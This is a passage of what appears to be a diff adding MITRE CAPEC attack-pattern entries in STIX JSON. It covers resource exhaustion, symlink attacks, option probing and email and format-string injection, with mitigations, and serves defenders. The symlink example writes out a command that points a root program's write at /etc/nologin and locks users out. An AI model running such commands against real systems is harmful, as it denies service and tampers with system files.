If a process has no legitimate reason to read an environment variable do not give that privilege.", + "id": "course-of-action--5ea96ff9-d08f-4da5-b893-17f63f09b83e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--36c8f1a2-fc68-4417-ba38-adaa3e68a90d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ea96ff9-d08f-4da5-b893-17f63f09b83e", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). 
Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.", + "external_references": [ + { + "external_id": "CAPEC-130", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/130.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-1325", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1325.html" + }, + { + "description": "Endpoint Denial of Service:Application Exhaustion Flood", + "external_id": "T1499.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/003" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Excessive Allocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (A successful excessive allocation attack forces the target system to exhaust its resources, thereby compromising the availability of its service.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target." 
+ ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de" + ], + "x_capec_prerequisites": [ + "The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the amount of resources that are accessible to unprivileged users.", + "id": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Consider all potentially relevant properties when validating input.", + "id": "course-of-action--98557606-654b-48be-90f9-47ef76f7034b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--282aa96a-4a57-42b1-826a-e6e4abbd87db", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98557606-654b-48be-90f9-47ef76f7034b", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "id": "course-of-action--74868224-146c-41a0-afd2-66580f01aa44", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--51e066b9-7488-4231-91fa-099bbb87c489", 
+ "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--74868224-146c-41a0-afd2-66580f01aa44", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use resource-limiting settings, if possible.", + "id": "course-of-action--e9d23f7b-bee1-4e7e-9621-9a0cb59e8bd4", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--98433369-590b-48b9-a19e-d159dde960e1", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9d23f7b-bee1-4e7e-9621-9a0cb59e8bd4", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.", + "external_references": [ + { + "external_id": "CAPEC-131", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Endpoint Denial of Service", + 
"external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Resource Leak Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful resource leak exposure attack compromises the availability of the target system's services.)", + "Resource Consumption (A successful resource leak exposure attack compromises the availability of the target system's services.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed.\n In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. 
Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack.\n Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must have a resource leak that the adversary can repeatedly trigger." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).", + "id": "course-of-action--cf45c4fb-cc58-4502-876c-56d851cd73f9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--adc4413e-bddd-423e-ba63-df78f79cc02f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--cf45c4fb-cc58-4502-876c-56d851cd73f9", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)", + "id": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function.", + "id": "course-of-action--e848e916-876c-4616-85ac-a44e4e90b63b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dbe99895-80e2-48af-966a-55f26aadd3d5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e848e916-876c-4616-85ac-a44e4e90b63b", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.", + "external_references": [ + { + "external_id": "CAPEC-132", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/132.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "description": "Boot or Logon Autostart Execution:Shortcut Modification", + "external_id": "T1547.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/009" + }, + { + "description": "Shaun Colley, Crafting Symlinks for Fun and Profit", + "external_id": "REF-13", + "source_name": "reference_from_CAPEC", + "url": "http://www.infosecwriters.com/texts.php?op=display&id=159" + } + ], + "id": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Symlink Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain 
Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The adversary creates a symlink with the \"same\" name as the file which the application is intending to write to. The application will write to the file- \"causing the data to be written where the symlink is pointing\". An attack like this can be demonstrated as follows:\n root# vulprog myFile\n {...program does some processing...]\n \n adversary# ln –s /etc/nologin myFile\n [...program writes to 'myFile', which points to /etc/nologin...]\n \n \n In the above example, the root user ran a program with poorly written file handling routines, providing the filename \"myFile\" to vulnprog for the relevant data to be written to. However, the adversary happened to be looking over the shoulder of \"root\" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: Adversary identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories.

  2. Techniques
    The adversary writes to files in different directories to check whether the application has sufficient checking before file operations.
    The adversary creates symlinks to files in different directories.

Experiment

  1. Try to create symlinks to different files: The adversary then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase.

  2. Techniques
    The adversary monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the adversary can delay the operations by using \"sleep(2)\" and \"usleep()\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.
    The adversary may need a little guesswork on the filenames on which the target application would operate.
    The adversary tries to create symlinks to the various filenames.

Exploit

  1. Target application operates on created symlinks to sensitive files: The adversary is able to create symlinks to sensitive files while the target application is operating on the file.

  2. Techniques
    Create the symlink to the sensitive file such as configuration files, etc.
", + "x_capec_extended_description": "\n The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications.\n In some variants of this attack the adversary may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the adversary may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the adversary to control the actions of the target or to cause the target to expose information to the adversary. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the adversary would normally have.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The adversary must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to create the necessary symbolic link." 
+ ], + "x_capec_skills_required": { + "High": "To identify the files and create the symlinks during the file operation time window", + "Low": "To create symlinks" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.", + "id": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8e73cf8-4cb5-4ae9-9a70-c2ebefdf62fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "target_ref": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use randomly generated file names for temporary files. 
Give the files restrictive permissions.", + "id": "course-of-action--a30baed8-dcc2-47af-93ca-38ef0fe2e8e2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9cf8f1cf-51b6-4745-843d-2b4655e99ce6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a30baed8-dcc2-47af-93ca-38ef0fe2e8e2", + "target_ref": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. 
Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.", + "external_references": [ + { + "external_id": "CAPEC-133", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/133.html" + }, + { + "external_id": "CWE-912", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/912.html" + } + ], + "id": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Try All Common Switches", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application: Discover an application of interest by exploring service registry listings or by connecting on a known port or some similar means.

  2. Techniques
    Search via internet for known, published applications that allow option switches.
    Use automated tools to scan known ports to identify applications that might be accessible
  3. Authenticate to application: Authenticate to the application, if required, in order to explore it.

  4. Techniques
    Use published credentials to access system.
    Find unpublished credentails to access service.
    Use other attack pattern or weakness to bypass authentication.

Experiment

  1. Try all common switches: Using manual or automated means, attempt to run the application with many different known common switches. Observe the output to see if any switches seemed to put the application in a non production mode that might give more information.

  2. Techniques
    Manually execute the application with switches such as --debug, --test, --development, --verbose, etc.
    Use automated tools to run the application with common switches and observe the output

Exploit

  1. Use sensitive processing or configuration information: Once extra information is observed from an application through the use of a common switch, this information is used to aid other attacks on the application

  2. Techniques
    Using application information, formulate an attack on the application
", + "x_capec_prerequisites": [ + "The attacker must be able to control the options or switches sent to the target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to send requests to the target." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Minimize switch and option functionality to only that necessary for correct function of the command.", + "id": "course-of-action--98da757a-6fb3-4a86-b0b3-c7731ca1325b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-133-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9849d6f7-11c6-49c0-a3b7-a87ba59d92c3", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98da757a-6fb3-4a86-b0b3-c7731ca1325b", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Remove all debug and testing options from production code.", + "id": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-133-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--007dc896-33a1-418f-8400-a4ae48f79658", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol.", + "external_references": [ + { + "external_id": "CAPEC-134", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "Mail Command Injection", + "external_id": "30", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Mail-Command-Injection" + } + ], + "id": "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Email Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Many applications allow users to send email messages by filling in fields. 
For example, a web site may have a link to \"share this site with a friend\" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an adversary adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an adversary can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1" + ], + "x_capec_prerequisites": [ + "The target application must allow the user to send email to some recipient, to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.", + "The adversary must have the ability to access the target mail application." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. 
For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.", + "external_references": [ + { + "external_id": "CAPEC-135", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/135.html" + }, + { + "external_id": "CWE-134", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "description": "Format string attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Format_string_attack" + }, + { + "description": "Hal Burch, Brendan Saulsbury, FIO30-C. 
